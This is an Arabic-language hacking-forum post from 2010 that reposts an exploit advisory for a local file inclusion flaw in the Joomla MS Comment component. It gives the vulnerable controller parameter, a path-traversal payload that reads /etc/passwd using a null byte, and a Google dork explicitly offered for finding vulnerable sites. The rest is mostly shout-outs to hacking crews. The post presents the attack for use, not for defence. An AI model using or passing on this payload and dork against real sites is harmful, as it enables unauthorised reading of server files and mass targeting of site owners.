عرض مشاركة واحدة
قديم 05-16-2010, 02:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Dr.NaNo
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Talking Joomla Component MS Comment LFI Vulnerability


اقتباس
# title: Joomla Component ms Comment lfi vulnerability
# edb-id: 12611
# cve-id: ()
# osvdb-id: ()
# author: Xr0b0t
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a

view source
print?
[!]================================================== =========================[!]

[~] Joomla Component ms Comment lfi vulnerability
[~] author : Xr0b0t (nyco.danis@gmail.com)
[~] homepage : http://www.indonesiancoder.com | http://xr0b0t.name | http://malangcyber.com
[~] date : 16 mei, 2010

[!]================================================== =========================[!]

[ software information ]

[+] price : Free
[+] Vulnerability : Lfi
[+] dork : Inurl:"com_mscomment" ;)
[+] version : 0.8.0b maybe lower also affected

[!]================================================== =========================[!]

[ vulnerable file ]

http://127.0.0.1/index.php?option=co...nt&controller=[indonesiancoder]

[ xpl ]

../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]================================================== =========================[!]

[ thx to ]

[+] kamtiez dulurku seng paling ganteng, endi kok ra rene
[+] indonesian coder team indonesianhacker malang cyber crew magelang cyber
[+] tukulesto,m3nw5,arianom,n4ck0,abah_benu,d0ntcry,bo byhikaru,gonzhack,senot
[+] contrex,yadoy666,pathloader,cimpli,marahmerah.ibl1 3z,r3m1ck,geni212
[+] coracore,gh4mb4s,jack-,vycod,m0rgue,otong,cs-31,yur4kha


[ note ]

[+] ojok jotos2an yo ..
[+] minggir semua arumbia team mau lewat ;)
[+] mbem : Lup u :">

[ quote ]

[+] indonesiancoder still r0x...
[+] arumbia team was here cuy mingir kabeh kate lewat ..
[+] malang cyber crew & magelang cyber community



الإستغلال ..:


اقتباس
[ vulnerable file ]

http://127.0.0.1/index.php?option=co...nt&controller=[indonesiancoder]

[ xpl ]

../../../../../../../../../../../../../../../etc/passwd%00




الدورك للبحث عن المواقع المصابة في محركات البحث مثل قوقل .:



اقتباس
inurl:"com_mscomment"





Joomla Component MS Comment LFI Vulnerability

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس